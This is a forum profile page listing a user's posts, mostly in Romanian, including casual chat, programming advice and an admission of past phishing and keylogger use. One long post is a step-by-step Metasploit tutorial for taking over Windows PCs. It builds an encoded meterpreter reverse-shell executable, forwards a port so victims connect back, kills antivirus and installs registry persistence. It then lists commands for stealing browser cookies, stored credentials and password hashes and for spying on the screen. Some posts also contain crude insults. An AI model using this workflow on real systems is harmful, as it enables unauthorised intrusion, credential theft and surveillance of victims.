Jump to content

uktea3

Active Members
  • Posts

    115
  • Joined

Everything posted by uktea3

  1. Pl?te?te b?iete dac? nu te duce mintea pe tine s? dai un s?rci calumea pe gug?l c? g?se?ti email spoofer,spammer plm,te asigur.
  2. Really mate ? 1. Posibil scam. 2. Cine dracu' nu-?i permite un skin de 0.5$ ??? Câ?tigi mai bine la eventuri free ...
  3. What the hell is this shit you moron? Whoever wants to make money should get a job.
  4. uktea3

    Salut !

    Bine ai venit ! ?i eu m-am al?turat de curând RST ?i am început sî înv?? Python. E un limbaj foarte simplu,pe care-l po?i înv??a rapid. Cum mi-a fost recomandat ?i mie,a?a ?i-l recomand ?i eu ?ie cu toat? inima . Am început s? înv?? ?i C++ . Mi se pare mai complicat ,î?i pune mintea la treab?,dar se merit?. Nu are nevoie de un curs serios de englez?.. Eu n-am urmat niciun curs.. Am prins de pe la ?coal? o ?âr? de englez? dar 90% am înv??at-o din jocuri ?i filme ?i nu am absolut nicio problem? . Evident nu zic asta autoevaluându-m?.
  5. Cine-?i pierde timpul scriind a?a ceva??I mean..ok,you're an attention whore dar plm chiar tre' s? te plictise?ti grav pentru a scrie a?a ceva...
  6. G3 e bomb?,crede-m?. E destul performant ,iar pân? acum n-am avut nici cea mai mic? problem? cu el.
  7. Pe bune? Mai bine de jumatate din tutorialele kali linux sunt ca asta.. Si pun pariu ca s-a pe forum de peste 50 de ori. Ceva nou n-aveti?
  8. This is a tutorial about how to hack Windows from version XP to 8.1(10??) from all around the world . THIS IS A COMPLETE TUTORIAL WITH ALL THE THINGS YOU COULD WISH FOR This tutorial is strictly for educational purposes only, I am not responsible for any of the action you may take upon others. Follow my steps ! Step 1 : Install Kali Linux (Backtrack's exploits,payloads etc are outdated) . Step 2 : Open a Terminal (Or Terminator) . Step 3 : Type these commands : apt-get update msfconsole use windows/meterpreter/reverse_tcp show options Now this will show up : Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique LHOST yes The listen address LPORT 4444 yes The listen port set LHOST YourPublicIP #hack out of your LAN or set LHOST YourLanIP #hack in your LAN ex for out-of-lan : set LHOST 106.102.246.23 or ex for in-lan : set LHOST 192.168.100.4 show encoders #find yourself a encoder generate -t exe -f virusexe -e thenameofencoder use exploit/multi/handler set LHOST yourlanip #ONLY YOUR LAN IP set ExitOnSession false #so you can get many others connections set PAYLOAD windows/meterpreter/reverse_tcp Now there's a thing that you're gonna need to do : Port-forwarding. Port Forward port 4444 or what port you chose. exploit -z -j After your victim ran the virus you should get this message in your terminal : [*] Sending stage (885806 bytes) to 79.112.31.18 (or whatever the victim's ip is) [*] Meterpreter session 2 opened (192.168.100.5:4444 -> 79.112.31.18:4983) at DATE run killav ps migrate id #migrate to a process run persistence -X -i 30 -p 4444 -r yourpublicipaddress/yourlanipaddress or run persistence -U -i 30 -p 4444 -r yourpublicipaddress/youtlanipaddress #if you don't know what these -u,-x etc mean type in run persistence -h #remember if you don't understand something always type in name -h then ask questions. Something like this will show up : [*] Running Persistence .... [*] Resource file for cleanup created at .... [*] Creating Payload= .... [*] Persistent agent script is 123456 bytes long.... [+] Persistent Script written to .... [*] Executing script .... [+] Agent executed with PID 4504 .... [*] Installing into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end [+] Installed into autorun as HKCU\Software\Microsoft\Windows\Current Version\Run\qdWeheEDUKp #or whatever the name is at the end reg queryval -k HKCL\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end or reg queryval -k HKCU\\Software\\Microsoft\\Windows\\Current Version\\Run -v qdWeheEDUKp #or whatever the name is at the end Useful commands (Not neccesary) : help #find here awesome commands run duplicate #you can run this so you can duplicate your meterpreter session if you execute risky commands your session might pe killed by the AV run enum_chrome #download cookies,history,web data etc of your victim's Google Chrome run enum_firefox #same but for firefox run enum_putty #see putty connections run get_application_list #get all names of the apps installed on victim's PC run getcountermeasure #checks for firewall,antivirus and stuff run get_env #extracts a list of all system and user environments variables run getfilezillacreds #you know what this does cmon run getgui #enables windows RDP run get_local_subnets #gets a list of local subnets run gettelnet #checks if the telnet is installed run getvncpasswors #gets vnc passwordsduuuh ? run hashdump #gets pasword hashes from SAM run multicommand #you can run multiple commands on host run multi_console_command #run multiple console commands on a meterpreter session run multi_meter_inject #you know what this does run packetrecorder #captures packets into PCAP files run prefetchtool #extracts info for prefetch folder run schelevator # exploit for windows privilege escalation and task scheduler 20 xml 0day by STUXNET run scraper #obtain system info from victim run screenspy #spies screen duuuh ??? run virtualbox_sysenter_dos #dos virtual box run birusscan_bypass #kills mcaffe virusscan v870i+ procceses This is Original Contnent If it's not Original Contnent i asume my fault. I haven't seen any thread about this before. Use this for legal purposes. If this is used for illegal purposes it's not my fault it's only yours.
  9. Mul?umesc tuturor ?i mersi de sfat,am început s? înv?? python. De ce te-ai lega de p?rin?ii mei ?
  10. Bun? RST. M? numesc Gabriel ?i sunt un simplu elev de clasa a Xa . Am fost atras de domeniul IT de prin clasa a 7a dar nu mi-am f?cut niciodat? timp s? m? interesez de acesta. Am început prin a-mi crea un server de counter strike 1.6 ...am v?zut c? acolo serverele se foloseau de aceste pluginuri.amxx ?i am fost curios "oare cum se face un plugin?" . Am avut câteva tentative de a crea pluginuri amxx dar am sfâr?it prin a modifica ?i combina câteva dintre ele. În orice caz,asta m-a aprins mai tare. Priveam leg?turile între ele ?i eram uimit de câte po?i face doar printr-un simplu script. În orice caz ...sunt un om foarte lene? a?a c? nu am continuat. Am f?cut câteva site-uri de phishing...câteva progr?mele în VB 2012...tot de phishing. ?iiiiiii în cele din urm? mi-am dat seama c? e prostie. A?a c? ce am f?cut? Am început s? fac alt? prostie. Am dat flud ba lu' vecinu' ,ba unor site-uri,ba cui m? enerva pe sv meu de cs 1.6 ?i mi-am dat seam? c? sunt foarte idiot pentru c? fac asta. Am f?cut câteva keloggere..Le-am instalat la ?coal?,m-au prins,mi-au sc?zut nota la purtare..în fine . Mi-am dat seama c? sunt foarte idiot,c? nimic din astea nu are rost. ?i m-am gândit...Nu mai bine fac eu ceva contstructiv? Sunt la profilul ?tiin?e ale naturii ?i în clasa a 9a am avut cea mai idioat? profesoar? de info. Nimic n-am înv??at. Nimic,absolut nimic. Nici nu ?tiam s? divid în pseudocod ?i tot am terminat cu 8 anul. Anul acesta mi s-a schimbat profa ?i deja ?tiu mai multe ca în anul trecut. Sunt la un liceu bun într-un ora? mare din România,nu dau detalii. Acuma...acuma vreau s? fac ceva util ?i vreau s? înv?? un limbaj de programare. A? dori s? încep cu unul cât mai simplu dar în final s? ajung la ceva complex . Îmi pute?i recomanda ceva ? Am petrecut câteva zile pe forumul acesta ?i chiar îmi place. De acum sper s?-i plac? ?i forumului de mine V? pup ?i v? urez numai bine !
×
×
  • Create New...